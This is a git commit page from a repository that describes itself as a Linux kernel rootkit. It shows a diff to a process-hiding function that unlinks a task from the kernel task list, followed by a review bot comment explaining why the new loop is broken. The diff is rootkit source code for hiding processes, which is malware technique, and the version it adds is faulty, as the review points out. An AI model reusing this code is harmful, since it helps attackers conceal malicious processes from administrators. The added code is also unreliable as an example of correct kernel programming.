linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit

commit 19c9c4d360340e54a932d1d0cf4e2a9c57fded32
parent dcfce15b0394b6e85aaa5a20e4f3289b20125b92
Author: deurzen <m.deurzen@tum.de>
Date:   Mon, 25 Jan 2021 03:08:26 +0100

attempt list_for_each_safe

Diffstat:
Mrootkit/src/pidhide.c | 17++++++++++++++---
1 file changed, 14 insertions(+), 3 deletions(-)

diff --git a/rootkit/src/pidhide.c b/rootkit/src/pidhide.c
@@ -2,7 +2,7 @@
 #include <linux/pid.h>
 #include <linux/sched.h>
 #include <linux/proc_fs.h>
-#include <linux/task.h>
+#include <linux/sched/task.h>
 #include "hook.h"
 #include "pidhide.h"
@@ -74,12 +74,23 @@ hide_pid(pid_t pid)
 if (!ts) return;
+ struct task_struct *tmp;
+ struct list_head *pos, *q;
+ struct task_struct mylist;
+
+
+
 rcu_read_lock();
 atomic_dec(&__task_cred(ts)->user->processes);
 rcu_read_unlock();
- write_lock_irq(rwlock);
- list_del(&ts->tasks);
+ write_lock_irq(rwlock);
+ list_for_each_safe(pos, q, &mylist.tasks){
+ tmp= list_entry(pos, struct task_struct, tasks);
+ if (pos == ts)
+ list_del(pos);
+ free(tmp);
+ }
 write_unlock_irq(rwlock);
 }
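Review bot: The new loop in `hide_pid` walks `&mylist.tasks`, but `mylist` is an uninitialised on-stack `struct task_struct`, so `list_for_each_safe` follows indeterminate `next` pointers while the write lock is held with interrupts disabled. Inside the loop, `pos == ts` compares a `struct list_head *` with a `struct task_struct *` (the entry is `tmp`, not `pos`), and because the `if` has no braces `free(tmp)` runs for every entry visited; `free()` is also not a function available to kernel code. Since `ts` is already known at this point, the loop adds nothing over the removed `list_del(&ts->tasks);` and should be dropped together with the `tmp`, `pos`, `q` and `mylist` declarations, which additionally sit after the `if (!ts)` statement. The function starts outside the hunk, so how `ts` and `rwlock` are obtained is not visible here.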